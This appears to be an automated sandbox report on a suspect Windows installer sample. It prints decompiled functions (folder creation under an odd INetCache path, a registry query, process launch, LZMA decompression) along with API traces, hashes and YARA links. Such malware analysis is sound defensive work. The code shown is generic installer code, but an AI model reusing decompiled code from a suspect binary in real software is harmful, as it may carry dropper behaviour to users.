Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405BC8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B4A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004057FC( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E00405819(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E0040577F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624C(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x00402245
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402ac2
0x00402ace

APIs

Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,?,?,75333420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75333420,00000000), ref: 00405BD6
Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth
API String ID: 1892508949-3690038070
Opcode ID: be059b02de55be546dd79f47ecb03ede3c1f21afff9b80660869a8e6f73aef5a
Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
Opcode Fuzzy Hash: be059b02de55be546dd79f47ecb03ede3c1f21afff9b80660869a8e6f73aef5a
Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040611A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060B9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406128
0x0040612a
0x00406142
0x00406147
0x0040614c
0x0040618a
0x0040618a
0x0040614e
0x00406160
0x0040616b
0x00406171
0x0040617c
0x00000000
0x00000000
0x0040617c
0x00406190

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040638E,80000002), ref: 00406160
RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll), ref: 0040616B

Strings

Call, xrefs: 00406121

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405831(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4266f0->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x4266f0,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040583a
0x0040585a
0x00405862
0x00405867
0x00000000
0x0040586d
0x00405871

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
CloseHandle.KERNEL32(?), ref: 00405867

Strings

Error launching installer, xrefs: 00405844

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C

Uniqueness

Uniqueness Score: -1.00%

Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406D8B() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071F9))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
